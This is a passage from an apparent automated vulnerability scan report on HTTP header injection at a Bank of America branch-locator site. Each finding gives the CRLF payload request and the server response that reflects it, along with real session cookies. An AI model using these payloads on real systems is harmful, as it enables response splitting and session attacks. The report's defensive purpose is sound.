P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/4cf53
189671db0d9?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.170. http://locators.bankofamerica.com/locator/locator/images/helpIcon.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/helpIcon.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f4b0a%0d%0a26741995ec5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/f4b0a%0d%0a26741995ec5 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=D869F8EE39265116CDBC55D7E46D9C53.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/f4b0a
26741995ec5?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.171. http://locators.bankofamerica.com/locator/locator/images/miniDownButton.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/miniDownButton.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload e209e%0d%0a1df449036e4 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/e209e%0d%0a1df449036e4 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=D02F2F0F71DBD86582210292F6A8E5F7.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/e209e
1df449036e4?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.172. http://locators.bankofamerica.com/locator/locator/images/miniDownButton_DRK.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/miniDownButton_DRK.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload e4ab6%0d%0a55b85990593 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/e4ab6%0d%0a55b85990593 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=39C6CCE8446008F99D6C11205DC1F8B1.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/e4ab6
55b85990593?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.173. http://locators.bankofamerica.com/locator/locator/images/printerIcon.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/printerIcon.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cdb49%0d%0a608497e0991 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/cdb49%0d%0a608497e0991 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=9E52E57E9CFBA691071C2363E0FA6A7D.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/cdb49
608497e0991?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.174. http://locators.bankofamerica.com/locator/locator/images/progressWheel.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/progressWheel.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 210d5%0d%0a265c18ee97d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/210d5%0d%0a265c18ee97d HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=D2B6AD5105B409C6F3A0D391170C6727.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/210d5
265c18ee97d?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.175. http://locators.bankofamerica.com/locator/locator/images/rightArrow.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/rightArrow.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6fed3%0d%0ad295be323e2 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/6fed3%0d%0ad295be323e2 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=C529455A7C6B9598EDDCEFF177FC731B.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/6fed3
d295be323e2?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.176. http://locators.bankofamerica.com/locator/locator/images/searchBoxLeftCap.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchBoxLeftCap.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6ad0c%0d%0a43d8bffb988 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/6ad0c%0d%0a43d8bffb988 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=58E22D75F4B6C385D3FE0481FA9EDCDB.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/6ad0c
43d8bffb988?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.177. http://locators.bankofamerica.com/locator/locator/images/searchBoxRightCap.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchBoxRightCap.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 39804%0d%0a52e49742134 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/39804%0d%0a52e49742134 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=53949FC183F732D2BED77588CD05538C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/39804
52e49742134?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.178. http://locators.bankofamerica.com/locator/locator/images/searchButton-o.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchButton-o.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 21a3b%0d%0a653ffbda00 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/21a3b%0d%0a653ffbda00 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E3D3354BF951B96A4F54D04B8F1E082D.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; state=MA; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; cmTPSet=Y

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B00AF408E8080B1AA52E9C7409C3682.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/21a3b
653ffbda00?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.179. http://locators.bankofamerica.com/locator/locator/images/searchButton.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchButton.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f2bea%0d%0a215ec076113 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/f2bea%0d%0a215ec076113 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=F108507A53BCD351C36B1ADE667E3CF3.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/f2bea
215ec076113?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.180. http://locators.bankofamerica.com/locator/locator/images/searchInputGlow_home.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchInputGlow_home.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 362c6%0d%0ad5cfbededf2 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/362c6%0d%0ad5cfbededf2 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=CFE4C348AFD06A609B29FB28DE632E0E.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/362c6
d5cfbededf2?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.181. http://locators.bankofamerica.com/locator/locator/images/searchReturnHeader.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchReturnHeader.png

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 622a4%0d%0abe2da5ba223 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/images/622a4%0d%0abe2da5ba223 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%7D; state=MA; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=001189B746F1D152C80A6E104F1FEBEF.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/images/622a4
be2da5ba223?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.182. http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/SessionTimeoutNotification.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ddc43%0d%0a0ed6538be97 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/ddc43%0d%0a0ed6538be97/SessionTimeoutNotification.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
